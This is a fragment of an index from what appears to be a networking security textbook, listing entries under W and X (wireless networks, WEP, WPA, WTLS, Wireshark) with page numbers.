vulnerability scanners, 373
W
WAP, 462-464
war driving, 489
WEP, 494-501
conguring, 501-504
cryptography, 494-495
decrypting, 523-526
key lengths, 495-496
process, 496-498
weaknesses, 498-501
WEPCrack, 527
Wi-Fi Protected Access, 507-509
Also see: WPA
wildcard mask, 136-138
Wired Equivalent Privacy, 494-501
Also see: WEP
Wireless Access Points, 448-449
Wireless Application Protocol, 462-464
Also see: WAP
wireless auditing, 512-513
Wireless Markup Language, 462-464
Also see: WML
wireless media, 451-457
infrared, 453-454
radio, 457-459
wireless network cards, 449
Also see: WNICs
wireless networking
access points, 448-449
equipment, 448-451
wireless networks
antennas, 449-451
association, 451
identifying, 514-515
microwave technology, 454
trusted, 528
Wireless Transport Layer Security, 491-493
Also see: WTLS
Wireshark, 513
GUI, 59-63
WLANs
ad-hoc mode, 466-467
APs, 465
associations, 466
authentication, 466
denial of service attacks, 490
essentials, 465
gaining access, 489-490
infrastructure mode, 467-468
threats, 488-490
topologies, 466-468
WML, 462-464
WNIC chipsets, 513
WNICs, 449
WPA, 507-509
conguring, 509
hardware requirements, 508
process, 507-508
supplicants, 509-511
vs. WEP, 508-509
WTLS, 491-493
Alert Protocol, 493
Application Protocol, 493
authentication, 491
Change Cipher Specic Protocol, 493
components, 491
handshake protocol, 491-493
origins, 491
X
x-cast, 44-45
INDEX
Index 549
SCPTPD20iePB

You might also like